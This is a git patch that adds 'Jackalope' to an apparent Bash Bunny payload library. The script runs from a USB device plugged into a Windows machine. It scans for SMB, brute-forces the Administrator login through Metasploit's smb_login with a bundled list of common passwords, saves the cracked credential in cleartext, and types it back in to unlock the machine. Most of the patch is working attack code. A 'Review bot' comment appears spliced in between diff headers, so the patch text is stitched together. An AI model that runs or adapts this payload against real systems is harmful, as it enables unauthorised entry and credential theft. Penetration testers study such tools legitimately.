From f171837db2170a4a41ee25d79dd4dd6450ab816d Mon Sep 17 00:00:00 2001 From: Catatonic Date: Wed, 22 May 2019 16:53:59 -0700 Subject: [PATCH] Add Jackalope (#380) * Adding Jackalope, a Bunny+Metasploit chimera project. * Fixing inaccurate documentation. * Generate the password entry payload on the alternate switch. * Additional documentation concerning alternate payload mechanism. * Branding * Update readme.md * rearchitecting payload to be independent. No longer overwrites alternate payload location. Uses WAIT interface to interact with the tester to reuse a password, clear the password, and re-attack the machine. --- .../library/credentials/Jackalope/payload.txt | 118 ++++++++++++++++++ .../library/credentials/Jackalope/readme.md | 49 ++++++++ .../credentials/Jackalope/userlist.txt | 1 + .../credentials/Jackalope/wordlist.txt | 100 +++++++++++++++ 4 files changed, 268 insertions(+) create mode 100644 payloads/library/credentials/Jackalope/payload.txt create mode 100644 payloads/library/credentials/Jackalope/readme.md create mode 100644 payloads/library/credentials/Jackalope/userlist.txt create mode 100644 payloads/library/credentials/Jackalope/wordlist.txt diff --git a/payloads/library/credentials/Jackalope/payload.txt b/payloads/library/credentials/Jackalope/payload.txt new file mode 100644 index 00000000..03e93196 --- /dev/null +++ b/payloads/library/credentials/Jackalope/payload.txt 
@@ -0,0 +1,118 @@
+#!/bin/bash
+#
+# Title: Jackalope
+# Author: catatonic
+# Version: 1.1.0
+
+# Check readiness & prepare environment
+LED SETUP
+
+# REQUIRE-TOOL metasploit-framework
+ATTACKMODE HID RNDIS_ETHERNET
+
+# Ensure loot is available for recording results.
+mount /dev/nandf /root/udisk/
+
+ORIGINAL_SWITCH=$SWITCH_POSITION
+PAYLOAD_DIR=/root/udisk/payloads/$SWITCH_POSITION
+LOOTBASE=/root/udisk/loot/Jackalope/
+
+# SETUP
+GET TARGET_IP
+GET TARGET_HOSTNAME
+
+COUNT=$(ls -lad $LOOTBASE/$TARGET_HOSTNAME* | wc -l)
+COUNT=$((COUNT+1))
+LOOTDIR=$LOOTBASE/$TARGET_HOSTNAME-$COUNT
+mkdir -p $LOOTDIR
+
+source /etc/profile.d/rvm.sh
+rvm --default use 2.6.2 >> $LOOTDIR/log.txt
+MSF_DIR=/tools/metasploit-framework
+
+# Save environment informaiton:
+echo "PAYLOAD_DIR: $PAYLOAD_DIR" >> $LOOTDIR/log.txt
+echo "MSF_DIR: $MSF_DIR" >> $LOOTDIR/log.txt
+echo "LOOTDIR: $LOOTDIR" >> $LOOTDIR/log.txt
+echo "TARGET_IP: $TARGET_IP" >> $LOOTDIR/log.txt
+echo "TARGET_HOSTNAME: $TARGET_HOSTNAME" >> $LOOTDIR/log.txt
+
+SYNC ()
+{
+ sync; sleep 1; sync
+}
+CLEAR_PW()
+{
+ LED SPECIAL
+ rm $PAYLOAD_DIR/quack_pass.txt
+ SYNC
+ WAIT
+}
+ENTER_PW()
+{
+ sleep 1
+ QUACK $ORIGINAL_SWITCH/quack_pass.txt
+ QUACK ENTER
+}
+RECON()
+{
+ ATTACKMODE RNDIS_ETHERNET
+ # Stage 1: Recon
+ LED STAGE1
+ echo "Executing nmap..." >> $LOOTDIR/log.txt
+ nmap -p 445 -Pn $TARGET_IP > $LOOTDIR/nmap_results.txt
+ if ! grep --quiet "445.*open" $LOOTDIR/nmap_results.txt;
+ then
+ LED FAIL2
+ SYNC
+ exit
+ fi
+}
+EXPLOIT()
+{
+ # Stage 2: Exploit
+ LED STAGE2
+ export HOME=/root
+ cd $MSF_DIR
+ ./msfconsole -q -x "use auxiliary/scanner/smb/smb_login; set RHOSTS $TARGET_IP; set USER_FILE $PAYLOAD_DIR/userlist.txt; set PASS_FILE $PAYLOAD_DIR/wordlist.txt; run; exit" > $LOOTDIR/msfconsole.txt
+
+ if ! grep --quiet "^\[+\]" $LOOTDIR/msfconsole.txt;
+ then
+ LED FAIL
+ echo "Payload failed, no logins found..." 
>> $LOOTDIR/log.txt
+ SYNC
+ exit
+ fi
+
+ grep "^\[+\]" $LOOTDIR/msfconsole.txt | grep -o \'.*\' | cut -d ':' -f 1 | cut -d "'" -f 2 > $LOOTDIR/user.txt
+ grep "^\[+\]" $LOOTDIR/msfconsole.txt | grep -o \'.*\' | cut -d ':' -f 2 | cut -d "'" -f 1 > $LOOTDIR/password.txt
+
+ # Focus needs to be set on the password field manually.
+ echo -n "STRING " > $PAYLOAD_DIR/quack_pass.txt
+ cat $LOOTDIR/password.txt >> $PAYLOAD_DIR/quack_pass.txt
+
+ SYNC
+}
+
+# High level view.
+while true
+do
+ if [ -f $PAYLOAD_DIR/quack_pass.txt ];
+ then
+ LED FINISH
+ else
+ RECON
+ EXPLOIT
+ continue
+ fi
+
+ WAIT
+
+ # User's choice, clear old password or enter password.
+ if [ "$SWITCH_POSITION" == "switch3" ];
+ then
+ CLEAR_PW
+ else
+ ENTER_PW
+ fi
+done
\ No newline at end of file
diff --git a/payloads/library/credentials/Jackalope/readme.md b/payloads/library/credentials/Jackalope/readme.md
new file mode 100644
index 00000000..40f2f4e7
--- /dev/null
+++ b/payloads/library/credentials/Jackalope/readme.md
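Review bot: The password extraction in EXPLOIT truncates any recovered password that contains a colon, because `cut -d ':' -f 2` keeps only the second colon-separated field of the quoted `user:pass` token; `cut -d ':' -f 2-` keeps the whole remainder, and the user line (`-f 1`) needs no change. The same pipeline also mis-parses a password containing a single quote, since both `grep -o \'.*\'` and the trailing `cut -d "'"` treat that character as a delimiter; a comment above the two grep lines should state the msfconsole line shape the parsing assumes (`Success: 'user:pass'` is what the cuts imply, but the hunk does not show it). The recovered credential is written in cleartext to `$LOOTDIR/password.txt`, `$LOOTDIR/msfconsole.txt` and `$PAYLOAD_DIR/quack_pass.txt`, while CLEAR_PW removes only the last of these, so a comment on CLEAR_PW should say the loot copies survive a "clear". `$TARGET_HOSTNAME`, presumably learned from the target, is expanded unquoted in `ls -lad $LOOTBASE/$TARGET_HOSTNAME*` and `mkdir -p $LOOTDIR`; quoting those expansions (and `"$TARGET_IP"` in the nmap and msfconsole lines) keeps an unusual hostname from being globbed or word-split into the loot path.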
@@ -0,0 +1,49 @@
+# Jackalope
+```
+ `\ # # /'
+ | \ # # /;|
+ \ :\# #|; /
+ \./#_#\./
+ / \
+ : O O "
+ | \ / |
+ \ v /
+ \_x_/
+
+Jackalope
+ by: catatonic
+```
+* Author: catatonic
+* Target: Windows (for now)
+
+## Description
+
+Uses ethernet to attempt dictionary attacks against passwords. When the password is discovered a payload is automatically generated and placed in the alternate switch location. This alternate payload may be used to unlock the machine by:
+
+1. Checking loot OR...
+2. Manually select user/password at login screen
+3. Flip switch to alternate payload to enter password
+
+To clear an already identified password from a GREEN status light, flip the switch to switch3 (arming) and the status light will change to SPECIAL (cyan).
+
+## Configuration
+No initial configuration is required for bunny firmware v1.6+.
+
+### Per attack configuration
+1. userlist.txt contains usernames to use in attack.
+2. wordlist.txt contains passwords to use in attack.
+
+Note: A fantastic collection of password wordlists are available: [SecLists](https://github.com/danielmiessler/SecLists)
+
+## STATUS
+
+| LED | Status |
+| ----------------------- | ---------------------------------------------- |
+| FAIL | Attack failed, username/password not found |
+| FAIL2 | Attack failed, network inaccessible |
+| STAGE 1 | Stage 1: checking for SMB port with nmap |
+| STAGE 2 | Stage 2: Brute forcing |
+| Green (solid) | Attack complete, check loot or flip switch to switch1 or switch2 to enter password. Flip switch to switch3 (arming) to clear password. |
+| SPECIAL | Clearing/cleared password, flip switch to switch 1 or switch 2 to initiate attack. |
+| Purple (solid) | Preparing to attack |
+
diff --git a/payloads/library/credentials/Jackalope/userlist.txt b/payloads/library/credentials/Jackalope/userlist.txt
new file mode 100644
index 00000000..56a3a34a
--- /dev/null
+++ b/payloads/library/credentials/Jackalope/userlist.txt
@@ -0,0 +1 @@
+Administrator
\ No newline at end of file
diff --git a/payloads/library/credentials/Jackalope/wordlist.txt b/payloads/library/credentials/Jackalope/wordlist.txt
new file mode 100644
index 00000000..18da5660
--- /dev/null
+++ b/payloads/library/credentials/Jackalope/wordlist.txt
@@ -0,0 +1,100 @@
+123456
+password
+12345678
+qwerty
+123456789
+12345
+1234
+111111
+1234567
+dragon
+123123
+baseball
+abc123
+football
+monkey
+letmein
+696969
+shadow
+master
+666666
+qwertyuiop
+123321
+mustang
+1234567890
+michael
+654321
+pussy
+superman
+1qaz2wsx
+7777777
+fuckyou
+121212
+000000
+qazwsx
+123qwe
+killer
+trustno1
+jordan
+jennifer
+zxcvbnm
+asdfgh
+hunter
+buster
+soccer
+harley
+batman
+andrew
+tigger
+sunshine
+iloveyou
+fuckme
+2000
+charlie
+robert
+thomas
+hockey
+ranger
+daniel
+starwars
+klaster
+112233
+george
+asshole
+computer
+michelle
+jessica
+pepper
+1111
+zxcvbn
+555555
+11111111
+131313
+freedom
+777777
+pass
+fuck
+maggie
+159753
+aaaaaa
+ginger
+princess
+joshua
+cheese
+amanda
+summer
+love
+ashley
+6969
+nicole
+chelsea
+biteme
+matthew
+access
+yankees
+987654321
+dallas
+austin
+thunder
+taylor
+matrix
\ No newline at end of file